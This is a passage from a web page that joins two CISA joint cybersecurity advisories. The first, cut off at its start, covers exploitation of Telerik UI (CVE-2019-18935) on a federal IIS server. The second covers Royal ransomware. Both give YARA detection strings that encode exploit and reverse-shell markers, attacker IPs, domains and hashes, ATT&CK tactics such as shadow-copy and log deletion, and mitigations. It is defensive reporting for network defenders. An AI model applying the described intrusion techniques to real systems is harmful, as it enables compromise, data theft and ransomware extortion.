
Actors modified file time attributes to insert misleading creation dates.

Decode Files

T1140

The base64 encoded text file small.txt decoded as the webshell small.aspx.

Discovery

   

Technique Title

ID

Use

File and Directory Discovery

T1083

Actors enumerated the IIS server via OS fingerprinting, executed Windows processes, and collected network information.

TA1’s malware enumerates systems, processes, files, and directories.

System Network Configuration Discovery

T1016

TA1’s malware gathers network parameters, including host name, domain name, DNS servers, NetBIOS ID, adapter information, IP address, subnet, gateway IP, and DHCP server.

Command and Control

   

Technique Title

ID

Use

Ingress Tool Transfer

T1105

TA1 and TA2 uploaded malicious DLL files (some masqueraded as PNG files) to the C:WindowsTemp directory.

Non-Application Layer Protocol

T1095

Actors used a non-application layer protocol (TCP) for w3wp.exe process exploitation, C2, and enumeration on the IIS server.

DETECTION METHODS

CISA and authoring organizations recommend that organizations review the steps listed in this section and Table 4: Identified ATT&CK Techniques for Enterprise to detect similar activity on IIS servers.

Yara Rule

CISA developed the following YARA rule from the base proof-of-concept code for CVE-2019-18935.[5] Note: Authoring organizations do not guarantee all malicious DLL files (if identified) will use the same code provided in this YARA rule.

rule CISA_10424018_01 {
meta:
        Author = "CISA Code & Media Analysis"
        Incident = "10424018"
        Date = "2023-02-07"
        Last_Modified = "20230216_1500"
        Actor = "n/a"
        Family = "n/a"
        Capabilities = "n/a"
        Malware_Type = "n/a"
        Tool_Type = "n/a"
        Description = "Detects open-source exploit samples"
        SHA256 = "n/a"
    strings:
        $s0 = { 3D 20 7B 20 22 63 6D 22 2C 20 22 64 2E 65 22 2C }
        $s1 = { 20 22 78 22 2C 20 22 65 22 20 7D 3B }
        $s2 = { 52 65 76 65 72 73 65 53 68 65 6C 6C 28 29 }
        $s3 = { 54 65 6C 65 72 69 6B 20 55 49 }
        $s4 = { 66 69 6C 65 6E 61 6D 65 5F 6C 6F 63 61 6C }
        $s5 = { 66 69 6C 65 6E 61 6D 65 5F 72 65 6D 6F 74 65 }
        $s6 = { 41 55 43 69 70 68 65 72 2E 65 6E 63 72 79 70 74 }
        $s7 = { 31 32 31 66 61 65 37 38 31 36 35 62 61 33 64 34 }
$s8 = { 43 6F 6E 6E 65 63 74 53 74 61 67 69 6E 67 53 65 72 76 65 72 28 29 }
        $s9 = { 53 74 61 67 69 6E 67 53 65 72 76 65 72 53 6F 63 6B 65 74 }
        $s10 = { 2A 62 75 66 66 65 72 20 3D 20 28 75 6E 73 69 67 6E 65 }
$s11 = { 28 2A 29 28 29 29 62 75 66 66 65 72 3B 0A 20 20 20 20 66 75 6E 63 28 29 3B }
$s12 = { 75 70 6C 6F 61 64 28 70 61 79 6C 6F 61 64 28 54 65 6D 70 54 61 72 67 65 74 }
        $s13 = { 36 32 36 31 36 66 33 37 37 35 36 66 32 66 }
    condition:
($s0 and $s1 and $s2) or ($s3 and $s4 and $s5 and $s6 and $s7) or ($s8 and $s9 and $s10 and $s11) or ($s12 and $s13)
}

Log Collection, Retention, and Analysis

CISA, FBI, and MS-ISAC recommend that organizations utilize a centralized log collection and monitoring capability, as well as implement or increase logging and forensic data retention. Longer retention policies improve the availability of data for forensic analysis and aid thorough identification of incident scope.

  • Centralized log collection and monitoring allows for the discovery of webshell and other exploit activity. For example, organizations should monitor for external connections made from the IIS server to unknown external IP addresses. Logging may also be available—if enabled at the router or firewall—for any outbound connections initiated with PowerShell.
  • Access- and security-focused firewall (e.g., Web Application Firewall [WAF]) logs can be collected and stored for use in both detection and forensic analysis activities. Organizations should use a WAF to guard against publicly known web application vulnerabilities, in addition to guarding against common web application attacks.
Creation of Malicious DLLs

CISA, FBI, and MS-ISAC recommend that organizations use process monitoring—which provides visibility into file system and application process activity—to detect suspicious executable files running from the C:WindowsTemp directory. Process monitoring via Windows Event Code 4688 will detect the legitimate w3wp.exe process running suspicious DLL files and other anomalous child processes. Note: Enabling this event may inundate security event logging. Use centralized log collection to prevent log rollover, increase log retention and archiving, and/or enable command line event logging.

Forensic analysis commonly identified the threat actors taking the following steps:

  1. Create one of the DLL files (C:WindowsTemp1665890187.8690152.dll) by process w3wp.exe PID 6484.
  2. Load the newly created DLL into a currently running IIS process, w3wp.exe PID 6484. 
  3. Make a TCP connection using w3wp.exe PID 6484 to 45.77.212[.]12 over port 443.
  4. Invoke C:WindowsSystem32vcruntime140.dll (Windows C runtime library) to execute payload.

Steps 1 and 2 occur every time a malicious DLL file is created. In some cases, an ASP .NET temp file was created, but this may have indicated benign IIS server activity. Note: The Process ID (PID) used in this example is unique to this investigation and is not universal. IP address 45.77.212[.]12 correlates to TA1, but the pattern can be used as general practice to identify similar activity.

Additional Searching for IIS Servers

The following information was derived from artifact analysis and is provided to equip IT infrastructure defenders searching for similar activity on an IIS server. Several artifacts can be referenced to assist in determining if CVE-2019-18935 has been successfully exploited.

File Type: DLL
Location: - %SystemDrive%WindowsTemp

When this CVE is exploited, it uploads malicious DLL files to the C:WindowsTemp directory. The malicious DLL file naming convention translates to the exact time the file was uploaded to the server.

The time is represented in a series of digits, known as Unix Epoch time. The files observed during this investigation contained two sets of digits separated by a period (.) before the DLL extension (.dll). Example: 1667206973.2270932.dll

Nearly all recovered files contain a series of 10 digits to the left of the period (.) and seven digits to the right. However, one file contained only five digits in the second set, which should be taken into consideration when writing regex patterns to search for the existence of these files. Example Regex: d{10}.d{1,8}.dll

These numbers can be copied and translated from digits into readable language with the month, day, year, hour, minute, and seconds displayed.

Log Type: IIS
Location: - %SystemDrive%inetpublogsLogFiles

When investigating IIS logs, specific fields were searched for and captured during the time of each connection.

If the Unix Epoch time signature has been translated from a DLL filename, specific logs can be searched based on that time. However, if the Unix Epoch time signature has not been translated, the following will still work, but may take longer for the query to run.

The four most important fields to identify this traffic are noted in the following table. These descriptions are sourced directly from Microsoft.[6]

Table 5: Four Fields Searched in IIS Logs

General Name

Field Name

Description

Method

cs-method

Requested action; for example, a GET method

URI Stem

cs-uri-stem

Universal Resource Identifier (URI), or target, of the action

URI Query

cs-uri-query

The query, if any, that the client was trying to perform; A URI query is necessary only for dynamic pages.

Protocol Status

sc-status

Hypertext Transfer Protocol (HTTP) or File Transfer Protocol (FTP) status code

Note: Depending on how logs are collected and stored, the field names may not be an exact match; this should be taken into consideration when constructing queries.

When ingesting logs into security information and event management (SIEM), the final field names did not use a hyphen (-) but used an underscore (_).

Example: cs_method instead of cs-method

Artifacts:
Table 6: Information Contained in Two Observed IIS Events

Field Name

Artifact

cs-method

POST

>cs-uri-stem

/Telerik.Web.UI.WebResource.axd

cs-uri-query

type=rau

sc-status

200 and 302

When reviewing logs, two IIS events were observed with the same timestamp each time this CVE-2019-18935 was exploited. Both events contained the same information in the cs-method, cs-uri-stem, and cs-uri-query. One event had a sc-status of 200 and the other had a sc-status of 302.

Log Type: Windows Event Application Logs
Location: -%SystemDrive%WindowsSystem32winevtlogsApplication.evtx

Kroll Artifact Parser and Extractor (KAPE), a forensic artifact collector and parser, was used to extract the Windows event logs from a backup image of the compromised IIS server. All field names refer to the labels provided via KAPE exports. The strings are of value and can be used to locate other artifacts if different tools are used. Note: The payload data in the following table has been shortened to only necessary strings to obscure and protect victim information.

Table 7: Example Payload Data

EventID

Payload

1309

3005, An unhandled exception has occurred[*redacted*]w3wp.exe[*redacted*]InvalidCastException, Unable to cast object of type 'System.Configuration.Install.AssemblyInstaller' to type 'Telerik.Web.UI.IAsyncUploadConfiguration'.n at Telerik.Web.UI.AsyncUploadHandler.GetConfiguration(String rawData)n at Telerik.Web.UI.AsyncUploadHandler.EnsureSetup()n at Telerik.Web.UI.AsyncUploadHandler.ProcessRequest(HttpContext context)n at Telerik.Web.UI.HandlerRouter.ProcessHandler(String handlerKey, HttpContext context)n at Telerik.Web.UI.WebResource.ProcessRequest(HttpContext context)n at System.Web.HttpApplication.CallHandlerExecutionStep.System.Web.HttpApplication.IExecutionStep.Execute()n at System.Web.HttpApplication.ExecuteStepImpl(IExecutionStep step)n at System.Web.HttpApplication.ExecuteStep(IExecutionStep step, Boolean& completedSynchronously)nn, [*redacted*]/Telerik.Web.UI.WebResource.axd?type=rau, /Telerik.Web.UI.WebResource.axd, [*redacted*], False, [*redacted*], 15, [*redacted*], False, at Telerik.Web.UI.AsyncUploadHandler.GetConfiguration(String rawData)n at Telerik.Web.UI.AsyncUploadHandler.EnsureSetup()n at Telerik.Web.UI.AsyncUploadHandler.ProcessRequest(HttpContext context)n at Telerik.Web.UI.HandlerRouter.ProcessHandler(String handlerKey, HttpContext context)n at Telerik.Web.UI.WebResource.ProcessRequest(HttpContext context)n at System.Web.HttpApplication.CallHandlerExecutionStep.System.Web.HttpApplication.IExecutionStep.Execute()n at System.Web.HttpApplication.ExecuteStepImpl(IExecutionStep step)n at System.Web.HttpApplication.ExecuteStep(IExecutionStep step, Boolean& completedSynchronously)n","Binary":""}}

Authoring organizations recommend looking for the following key strings in the payload:

  • w3wp.exe: This is the parent process that executes the code inside the malicious DLLs.
  • System.Configuration.Install.AssemblyInstaller: Figure 1 is from the creator’s GitHub repo,[7] where the string can be observed in the code. As presented by Bishop Fox and proven during authoring organizations’ investigation of IIS server logs, an exception does not mean that the exploit failed, but more likely that it executed successfully.[3]
Figure 1: Threat Actor Assembly Installer
Figure 1: Threat Actor Assembly Installer

If a Werfault crash report was written, Windows event application logs may contain evidence of this— even if the DLLs have been removed from the system as part of a cleanup effort by the threat actors.

Table 8: Example Threat Actor Cleanup

EventID

ExecutableInfo

MapDescription

Payload

1000

w3wp.exe |1664175639.65719.dll

|c:windowssystem32inetsrvw3wp.exe |C:WindowsTemp1664175639.65719.dll

Application Error

{"EventData":{"Data":"w3wp.exe, 8.5.9600.16384, 5215df96, 1664175639.65719.dll, 0.0.0.0, 63314d94, c00000fd, 00000000000016f8, 1708, 01d8d0a5f84af443, c:\windows\system32\inetsrv\w3wp.exe, C:\Windows\Temp\1664175639.65719.dll, eed89eeb-3d68-11ed-817c-005056990ed7","Binary":""}}

1001

w3wp.exe |1664175639.65719.dll |C:ProgramDataMicrosoftWindowsWERReportQueueAppCrash_w3wp.exe |C:ProgramDataMicrosoftWindowsWERReportQueueAppCrash_w3wp.exe |C:ProgramDataMicrosoftWindowsWERReportQueueAppCrash_w3wp.exe

Application Crash

{"EventData":{"Data":"0, APPCRASH, Not available, 0, w3wp.exe, 8.5.9600.16384, 5215df96, 1664175639.65719.dll, 0.0.0.0, 63314d94, c00000fd, 00000000000016f8, nC:\Windows\Temp\WERE3F6.tmp.appcompat.txtnC:\Windows\Temp\WERE639.tmp.WERInternalMetadata.xmlnC:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_w3wp.exe_d538da447d49df5862c37684118d0c25c2eff_9e3fd63b_cab_0c3ee656\memory.hdmpnC:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_w3wp.exe_d538da447d49df5862c37684118d0c25c2eff_9e3fd63b_cab_0c3ee656\triagedump.dmp, C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_w3wp.exe_d538da447d49df5862c37684118d0c25c2eff_9e3fd63b_cab_0c3ee656, 0, eed89eeb-3d68-11ed-817c-005056990ed7, 4","Binary":""}}

The EventID field maps to Windows EventIDs for an easy filter. Users can leverage the Windows EventIDs to find malicious DLL with the Unix Epoch time-based name inside the C:WindowsTemp directory.

Depending how log analysis is performed, various filters can be determined. However, if regex is available, the example listed in Table 8 above can be reused to match the Unix Epoch timestamp convention to assist in filtering.

Additional Analysis

When evidence of malicious DLLs is found, reverse engineering will need to be conducted to fully understand what actions occur as the malicious files could do nearly anything. Leveraging Windows security event logs, as well as Windows PowerShell logs, may provide insight into what actions the DLLs are taking. CISA and authoring organizations recommend the following process:

  1. Convert any discovered malicious DLL timestamps to readable format.
  2. Export the Windows security event and PowerShell logs from the device.
    • Default path: %SystemDrive%WindowsSystem32winevtlogsWindows PowerShell
    • Default path: %SystemDrive%WindowsSystem32winevtlogsSecurity.evtx
  3. Filter based on identified timestamps.
  4. Search for new processes created via w3wp.exe in Windows security event logs (e.g., Windows EventID 4688 New Process created).
  5. Search for new PIDs from identified events. Investigate to determine if they spawned any other processes.
    • Example: CMD.EXE launching PowerShell or running other commands such as nslookup or netstat. Note: This is not an exhaustive list.
  6. Search for EventID 600 in PowerShell logs.
Trellix XDR Platform Searching

If Trellix XDR Platform is deployed in an environment and a standard HX triage audit is completed in a timely manner of the suspected use of CVE-2019-18935, an organization can search for file write events from known web processes. This will identify the executables written by the web server process. CISA and authoring organizations specifically recommend searching for the following field value pair:

Table 9: Field Value Pair for Searching

Field

Value Begins With

TextAtLowestOffset

MZ

MITIGATIONS

Note: These mitigations align with the Cross-Sector Cybersecurity Performance Goals (CPGs) developed by CISA and the National Institute of Standards and Technology (NIST). The CPGs provide a minimum set of practices and protections that CISA and NIST recommend all organizations implement. CISA and NIST based the CPGs on existing cybersecurity frameworks and guidance to protect against the most common and impactful threats, tactics, techniques, and procedures. Visit CISA’s Cross-Sector Cybersecurity Performance Goals for more information on the CPGs, including additional recommended baseline protections.

Manage Vulnerabilities and Configurations
  • Upgrade all instances of Telerik UI ASP.NET AJAX to the latest version after appropriate testing. Keep all software up to date and prioritize patching to known exploited vulnerabilities (KEVs). [CPG 5.1]
  • Prioritize remediation of vulnerabilities on internet-facing systems. For additional guidance, see CISA Insights - Remediate Vulnerabilities for Internet-Accessible Systems. [CPG 5.1]
  • Implement a patch management solution to ensure compliance with the latest security patches. A patch management solution that inventories all software running in addition to vulnerability scanning is recommended.
  • Ensure vulnerability scanners are configured to scan a comprehensive scope of devices and locations. For example, as noted in the Technical Details section, the victim organization had the appropriate plugin for CVE-2019-18935, but the vulnerability went undetected due to the Telerik UI software being installed in a file path not typically scanned. To identify unpatched instances of software vulnerabilities, organizations using vulnerability scanners should be aware that all installations may not be considered “typical” and may require full file scans of web applications.
    • Note: Vulnerability scanners may have limitations in detecting vulnerabilities, such as only being able to identify Windows Installer-installed applications, which was the case with this agency’s vulnerability scanner. The Telerik UI software was installed via a continuous integration (CI) and continuous delivery (CD) pipeline rather than the Windows Installer. This highlights the importance of using a comprehensive approach for vulnerability scanning that considers all potential installation methods and file paths.
  • Validate output from patch management and vulnerability scanning solutions against running services to check for discrepancies and account for all services.
 Segment Networks Based on Function
  • Implement network segmentation to separate network segments based on role and functionality. Proper network segmentation significantly reduces the ability for threat actor lateral movement by controlling traffic flows between—and access to—various subnetworks. (See CISA’s Layering Network Security Through Segmentation infographic and the National Security Agency’s Segment Networks and Deploy Application-Aware Defenses.) [CPG 8.1]
  • Isolate similar systems and implement micro-segmentation with granular access and policy restrictions to modernize cybersecurity and adopt zero trust principles for both network perimeter and internal devices. Logical and physical segmentation are critical to limiting and preventing lateral movement, privilege escalation, and exfiltration. Utilize access control lists (ACLs), hardened firewalls, and network monitoring devices to regulate, monitor, and audit cross-segment access and data transfers.
Other Best Practice Mitigation Recommendations
  • Implement phishing-resistant multifactor authentication (MFA) for as many services possible—particularly for webmail, virtual private networks (VPNs), accounts that access critical systems, and privileged accounts that manage backups.
    • MFA can still be leveraged for secure access using a jump server—an asset placed between the external and internal networks that serves as an intermediary for access—to facilitate connections if assets do not have the capability to support MFA implementation.
    • For additional guidance on secure MFA configurations, visit cisa.gov/mfa. [CPG 1.3]
  • Monitor and analyze activity logs generated from Microsoft IIS and remote PowerShell. Collect access and security focused logs (IDS/IDPS, firewall, DLP, VPN) and ensure logs are securely stored for a specified duration informed by risk or pertinent regulatory guidance. [CPG 3.1, 3.2]
    • Evaluate user permissions and maintain separate user accounts for all actions and activities not associated with the administrator role, e.g., for business email, web browsing, etc. All privileges should be reevaluated on a recurring basis to validate continued need for a given set of permissions. [CPG 1.5]
  • Limit service accounts to the minimum permissions necessary to run services. CISA observed numerous error messages in network logs indicative of failed attempts to write files to additional directories or move laterally.
  • Maintain a robust asset management policy through comprehensive documentation of assets, tracking current version information to maintain awareness of outdated software, and mapping assets to business and critical functions.
    • Determine the need and functionality of assets that require public internet exposure. [CPG 2.3]

VALIDATE SECURITY CONTROLS

In addition to applying mitigations, CISA, FBI, and MS-ISAC recommend exercising, testing, and validating your organization's security program against the threat behaviors mapped to the MITRE ATT&CK for Enterprise framework in this advisory. CISA and co-sealers recommend testing your existing security controls inventory to assess how they perform against the ATT&CK techniques described in this advisory.

To get started:

  1. Select an ATT&CK technique described in this advisory (see Table 4).
  2. Align your security technologies against the selected technique.
  3. Test your technologies against the technique.
  4. Analyze your detection and prevention technologies’ performance.
  5. Repeat the process for all security technologies to obtain a set of comprehensive performance data.
  6. Tune your security program—including people, processes, and technologies—based on the data generated by this process.

CISA, FBI, and MS-ISAC recommend continually testing your security program, at scale, in a production environment to ensure optimal performance against the MITRE ATT&CK techniques identified in this advisory.

RESOURCES

UNIX Timestamp Converter

REFERENCES

[1] Telerik: Exploiting .NET JavaScriptSerializer Deserialization (CVE-2019-18935)
[2] ACSC Advisory 2020-004
[3] Bishop Fox CVE-2019-18935: Remote Code Execution via Insecure Deserialization in Telerik UI
[4] Volexity Threat Research: XE Group
[5] GitHub: Proof-of-Concept Exploit for CVE-2019-18935
[6] Microsoft: Configure Logging in IIS
[7] GitHub: CVE-2019-18935

ACKNOWLEDGEMENTS

Google’s Threat Analysis Group (TAG) contributed to this CSA.

Please share your thoughts. We recently updated our anonymous Product Feedback Survey and we'd welcome your feedback.

February 24, 2023

#StopRansomware: Royal Ransomware | CISA

SUMMARY

Note: This joint Cybersecurity Advisory (CSA) is part of an ongoing #StopRansomware effort to publish advisories for network defenders that detail various ransomware variants and ransomware threat actors. These #StopRansomware advisories include recently and historically observed tactics, techniques, and procedures (TTPs) and indicators of compromise (IOCs) to help organizations protect against ransomware. Visit stopransomware.gov to see all #StopRansomware advisories and to learn more about other ransomware threats and no-cost resources.

Actions to take today to mitigate cyber threats from ransomware:

The Federal Bureau of Investigation (FBI) and the Cybersecurity and Infrastructure Security Agency (CISA) are releasing this joint CSA to disseminate known Royal ransomware IOCs and TTPs identified through FBI threat response activities as recently as January 2023.

Since approximately September 2022, cyber criminals have compromised U.S. and international organizations with a Royal ransomware variant. FBI and CISA believe this variant, which uses its own custom-made file encryption program, evolved from earlier iterations that used “Zeon” as a loader. After gaining access to victims’ networks, Royal actors disable antivirus software and exfiltrate large amounts of data before ultimately deploying the ransomware and encrypting the systems. Royal actors have made ransom demands ranging from approximately $1 million to $11 million USD in Bitcoin. In observed incidents, Royal actors do not include ransom amounts and payment instructions as part of the initial ransom note. Instead, the note, which appears after encryption, requires victims to directly interact with the threat actor via a .onion URL (reachable through the Tor browser). Royal actors have targeted numerous critical infrastructure sectors including, but not limited to, Manufacturing, Communications, Healthcare and Public Healthcare (HPH), and Education.

FBI and CISA encourage organizations to implement the recommendations in the Mitigations section of this CSA to reduce the likelihood and impact of ransomware incidents.

Download the PDF version of this report:

For a downloadable copy of IOCs, see

AA23-061A STIX XML (XML, 115.20 KB )

TECHNICAL DETAILS

Note: This advisory uses the MITRE ATT&CK® for Enterprise framework, version 12. See MITRE ATT&CK for Enterprise for all referenced tactics and techniques.

Royal ransomware uses a unique partial encryption approach that allows the threat actor to choose a specific percentage of data in a file to encrypt. This approach allows the actor to lower the encryption percentage for larger files, which helps evade detection.[1] In addition to encrypting files, Royal actors also engage in double extortion tactics in which they threaten to publicly release the encrypted data if the victim does not pay the ransom.

Initial Access

Royal actors gain initial access to victim networks in a number of ways including: 

  • Phishing. According to third-party reporting, Royal actors most commonly (in 66.7% of incidents) gain initial access to victim networks via successful phishing emails [T1566].
    • According to open-source reporting, victims have unknowingly installed malware that delivers Royal ransomware after receiving phishing emails containing malicious PDF documents [T1566.001], and malvertising [T1566.002].[2]
  • Remote Desktop Protocol (RDP). The second most common vector Royal actors use (in 13.3% of incidents) for initial access is RDP compromise.  
  • Public-facing applications. FBI has also observed Royal actors gain initial access through exploiting public-facing applications [T1190]. 
  • Brokers. Reports from trusted third-party sources indicate that Royal actors may leverage brokers to gain initial access and source traffic by harvesting virtual private network (VPN) credentials from stealer logs. 
Command and Control

Once Royal actors gain access to the network, they communicate with command and control (C2) infrastructure and download multiple tools [T1105]. Legitimate Windows software is repurposed by Royal operators to strengthen their foothold in the victim’s network. Ransomware operators often use open-source projects to aid their intrusion activities; Royal operators have recently been observed using Chisel, a tunneling tool transported over HTTP and secured via SSH [T1572], to communicate with their C2 infrastructure. FBI has observed multiple Qakbot C2s used in Royal ransomware attacks, but has not yet determined if Royal ransomware exclusively uses Qakbot C2s.

Lateral Movement and Persistence

Royal actors often use RDP to move laterally across the network [T1021.001]. Microsoft Sysinternals tool PsExec has also been used to aid lateral movement. FBI has observed Royal actors using remote monitoring and management (RMM) software, such as AnyDesk, LogMeIn, and Atera, for persistence in the victim’s network [T1133]. In some instances, the actors moved laterally to the domain controller. In one confirmed case, the actors used a legitimate admin account to remotely log on to the domain controller [T1078]. Once on the domain controller, the threat actor deactivated antivirus protocols [T1562.001] by modifying Group Policy Objects [T1484.001].

Exfiltration

Royal actors exfiltrate data from victim networks by repurposing legitimate cyber pentesting tools, such as Cobalt Strike, and malware tools and derivatives, such as Ursnif/Gozi, for data aggregation and exfiltration. According to third-party reporting, Royal actors’ first hop in exfiltration and other operations is usually a U.S. IP address.

Note: In reference to Cobalt Strike and other tools mentioned above, a tool repository used by Royal was identified at IP: 94.232.41[.]105 in December 2022.

Encryption

Before starting the encryption process, Royal actors: 

  • Use Windows Restart Manager to determine whether targeted files are currently in use or blocked by other applications [T1486].[1
  • Use Windows Volume Shadow Copy service (vssadmin.exe) to delete shadow copies to prevent system recovery.[1]  

FBI has found numerous batch (.bat) files on impacted systems which are typically transferred as an encrypted 7zip file. Batch files create a new admin user [T1078.002], force a group policy update, set pertinent registry keys to auto-extract [T1119] and execute the ransomware, monitor the encryption process, and delete files upon completion—including Application, System, and Security event logs [T1070.001].

Malicious files have been found in victim networks in the following directories:

  • C:Temp  
  • C:UsersAppDataRoaming  
  • C:Users 
  • C:ProgramData
Indicators of Compromise (IOC)

See table 1 and 2 for Royal ransomware IOCs that FBI obtained during threat response activities as of January 2023. Note: Some of the observed IP addresses are several months old. FBI and CISA recommend vetting or investigating these IP addresses prior to taking forward-looking action, such as blocking.

Table 1: Royal Ransomware Associated Files, Hashes, and IP addresses as of January 2023

IOC

Description

.royal

Encrypted file extension

README.TXT

Ransom note

Malicious IP

Last Activity

102.157.44[.]105

November 2022

105.158.118[.]241

November 2022

105.69.155[.]85

November 2022

113.169.187[.]159

November 2022

134.35.9[.]209

November 2022

139.195.43[.]166

November 2022

139.60.161[.]213

November 2022

148.213.109[.]165

November 2022

163.182.177[.]80

November 2022

181.141.3[.]126

November 2022

181.164.194[.]228

November 2022

185.143.223[.]69

November 2022

186.64.67[.]6

November 2022

186.86.212[.]138

November 2022

190.193.180[.]228

November 2022

196.70.77[.]11

November 2022

197.11.134[.]255

November 2022

197.158.89[.]85

November 2022

197.204.247[.]7

November 2022

197.207.181[.]147

November 2022

197.207.218[.]27

November 2022

197.94.67[.]207

November 2022

23.111.114[.]52

November 2022

41.100.55[.]97

November 2022

41.107.77[.]67

November 2022

41.109.11[.]80

November 2022

41.251.121[.]35

November 2022

41.97.65[.]51

November 2022

42.189.12[.]36

November 2022

45.227.251[.]167

November 2022

5.44.42[.]20

November 2022

61.166.221[.]46

November 2022

68.83.169[.]91

November 2022

81.184.181[.]215

November 2022

82.12.196[.]197

November 2022

98.143.70[.]147

November 2022

140.82.48[.]158

December 2022

147.135.36[.]162

December 2022

147.135.11[.]223

December 2022

152.89.247[.]50

December 2022

172.64.80[.]1

December 2022

179.43.167[.]10

December 2022

185.7.214[.]218

December 2022

193.149.176[.]157

December 2022

193.235.146[.]104

December 2022

209.141.36[.]116

December 2022

45.61.136[.]47

December 2022

45.8.158[.]104

December 2022

5.181.234[.]58

December 2022

5.188.86[.]195

December 2022

77.73.133[.]84

December 2022

89.108.65[.]136

December 2022

94.232.41[.]105

December 2022

47.87.229[.]39

January 2023

Malicious Domain

Last Observed

ciborkumari[.]xyz

October 2022

sombrat[.]com

October 2022

gororama[.]com

November 2022

softeruplive[.]com

November 2022

altocloudzone[.]live

December 2022

ciborkumari[.]xyz

December 2022

myappearinc[.]com

December 2022

parkerpublic[.]com

December 2022

pastebin.mozilla[.]org/Z54Vudf9/raw

December 2022

tumbleproperty[.]com

December 2022

myappearinc[.]com/acquire/draft/c7lh0s5jv

January 2023

Table 2: Tools used by Royal operators

Tool

SHA256

AV tamper

8A983042278BC5897DBCDD54D1D7E3143F8B7EAD553B5A4713E30DEFFDA16375

TCP/UDP Tunnel over HTTP (Chisel)

8a99353662ccae117d2bb22efd8c43d7169060450be413af763e8ad7522d2451

Ursnif/Gozi

be030e685536eb38ba1fec1c90e90a4165f6641c8dc39291db1d23f4ee9fa0b1

Exfil

B8C4AEC31C134ADBDBE8AAD65D2BCB21CFE62D299696A23ADD9AA1DE082C6E20

Remote Access (AnyDesk)

4a9dde3979c2343c024c6eeeddff7639be301826dd637c006074e04a1e4e9fe7

PowerShell Toolkit Downloader

4cd00234b18e04dcd745cc81bb928c8451f6601affb5fa45f20bb11bfb5383ce

PsExec (Microsoft Sysinternals)

08c6e20b1785d4ec4e3f9956931d992377963580b4b2c6579fd9930e08882b1c

Keep Host Unlocked (Don’t Sleep)

f8cff7082a936912baf2124d42ed82403c75c87cb160553a7df862f8d81809ee

Ransomware Executable

d47d4b52e75e8cf3b11ea171163a66c06d1792227c1cf7ca49d7df60804a1681

Windows Command Line (NirCmd)

216047C048BF1DCBF031CF24BD5E0F263994A5DF60B23089E393033D17257CB5

System Management (NSudo)

19896A23D7B054625C2F6B1EE1551A0DA68AD25CDDBB24510A3B74578418E618

Batch Scripts

 

Filename

Hash Value

2.bat

585b05b290d241a249af93b1896a9474128da969

3.bat

41a79f83f8b00ac7a9dd06e1e225d64d95d29b1d

4.bat

a84ed0f3c46b01d66510ccc9b1fc1e07af005c60

8.bat

c96154690f60a8e1f2271242e458029014ffe30a

kl.bat

65dc04f3f75deb3b287cca3138d9d0ec36b8bea0

gp.bat

82f1f72f4b1bfd7cc8afbe6d170686b1066049bc7e5863b51aa15ccc5c841f58

r.bat

74d81ef0be02899a177d7ff6374d699b634c70275b3292dbc67e577b5f6a3f3c

runanddelete.bat

342B398647073159DFA8A7D36510171F731B760089A546E96FBB8A292791EFEE

MITRE ATT&CK TECHNIQUES

See table 3 for all referenced threat actor tactics and techniques included in this advisory.

Table 3: Royal Actors ATT&CK Techniques for Enterprise

Initial Access

   

Technique Title

ID

Use

Exploit Public Facing Application

T1190

The actors gain initial access through public-facing applications.

Phishing: Spear phishing Attachment

T1566.001

The actors gain initial access through malicious PDF attachments sent via email.

Phishing: Spearphishing Link

T1566.002

The actors gain initial access using malvertising links via emails and public-facing sites.

External Remote Services

T1133

The actors gain initial access through a variety of RMM software.

Command and Control

   

Technique Title

ID

Use

Ingress Tool Transfer

T1105

The actors used C2 infrastructure to download multiple tools.

Protocol Tunneling

T1572

The actors used an encrypted SSH tunnel to communicate within C2 infrastructure.

                                                              Privilege Escalation

   

Technique Title

ID

Use

Valid Accounts: Domain Accounts

T1078.002

The actors used encrypted files to create new admin user accounts.

Defense Evasion

   

Technique Title

ID

Use

Impair Defenses: Disable or Modify Tools

T1562.001

The actors deactivated antivirus protocols.

Domain Policy Modification: Group Policy Modification

T1484.001

The actors modified Group Policy Objects to subvert antivirus protocols.

Indicator Removal: Clear Windows Event Logs

T1070.001

The actors deleted shadow files and system and security logs after exfiltration.

Remote Desktop Protocol

T1021.001

The actors used valid accounts to move laterally through the domain controller using RDP.

Automated Collection

T1119

The actors used registry keys to auto-extract and collect files.

                                                                         Impact  

   

Technique Title

ID

Use

Data Encrypted for Impact

T1486

The actors encrypted data to determine which files were being used or blocked by other applications.

MITIGATIONS

FBI and CISA recommend network defenders apply the following mitigations to limit potential adversarial use of common system and network discovery techniques and to reduce the risk of compromise by Royal ransomware. These mitigations follow CISA’s Cybersecurity Performance Goals (CPGs), which provide a minimum set of practices and protections that are informed by the most common and impactful threats, tactics, techniques, and procedures, and which yield goals that all organizations across critical infrastructure sectors should implement:

  • Implement a recovery plan to maintain and retain multiple copies of sensitive or proprietary data and servers [CPG 7.3] in a physically separate, segmented, and secure location (i.e., hard drive, storage device, the cloud).
  • Require all accounts with password logins (e.g., service account, admin accounts, and domain admin accounts) to comply with National Institute for Standards and Technology (NIST) standards for developing and managing password policies [CPG 3.4].
    • Use longer passwords consisting of at least 8 characters and no more than 64 characters in length [CPG 1.4].
    • Store passwords in hashed format using industry-recognized password managers.
    • Add password user “salts” to shared login credentials.
    • Avoid reusing passwords.
    • Implement multiple failed login attempt account lockouts [CPG 1.1].
    • Disable password hints.
    • Refrain from requiring password changes more frequently than once per year. Note: NIST guidance suggests favoring longer passwords instead of requiring regular and frequent password resets. Frequent password resets are more likely to result in users developing password patterns cyber criminals can easily decipher. 
    • Require administrator credentials to install software.
  • Require multifactor authentication [CPG 1.3] for all services to the extent possible, particularly for webmail, virtual private networks, and accounts that access critical systems. 
  • Keep all operating systems, software, and firmware up to date. Timely patching is one of the most efficient and cost-effective steps an organization can take to minimize its exposure to cybersecurity threats. 
  • Segment networks [CPG 8.1]. Network segmentation can help prevent the spread of ransomware by controlling traffic flows between—and access to—various subnetworks and by restricting adversary lateral movement. 
  • Identify, detect, and investigate abnormal activity and potential traversal of the indicated ransomware with a networking monitoring tool. To aid in detecting ransomware, implement a tool that logs and reports all network traffic [CPG 5.1], including lateral movement activity on a network. Endpoint detection and response (EDR) tools are useful for detecting lateral connections as they have insight into common and uncommon network connections for each host. 
  • Install, regularly update, and enable real time detection for antivirus software on all hosts.
  • Review domain controllers, servers, workstations, and active directories for new and/or unrecognized accounts.
  • Audit user accounts with administrative privileges and configure access controls according to the principle of least privilege [CPG 1.5].
  • Disable unused ports.
